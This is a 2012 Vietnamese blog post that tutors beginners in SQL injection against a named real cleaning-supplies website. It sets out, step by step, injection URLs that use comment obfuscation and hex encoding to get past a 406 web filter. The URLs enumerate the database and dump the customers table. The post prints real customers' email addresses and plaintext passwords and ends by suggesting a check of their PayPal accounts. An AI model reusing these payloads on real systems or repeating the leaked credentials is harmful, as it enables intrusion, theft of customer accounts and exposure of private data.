Thứ Sáu, 22 tháng 6, 2012

[Tut] Bypass 406 SQL for Newbie

Hôm này khai mạc Euro 2012 nên mình mạo muội làm cái tut sql dạng 406 cho Newbie mong các bạn biết rồi đừng ném gạch nhuể.

Site:


Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
+ Order by:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
-->Ko lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
-->lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Tiến hành By pass:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
-> 1
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+Tiếp tục by pass:
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
-->
articles,auth,categories,customers,manufacturers,o rders,products,specialfiles
+ Get colums: customers
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
-->
id,email,password,passhash,joindate,firstname,mi,l astname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders

+Get id,email,password:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
-->
4|dpdurrell@hotmail.com|preston59

3|josh@uppertech.net|eeq7322
----> Check PP .

Không có nhận xét nào: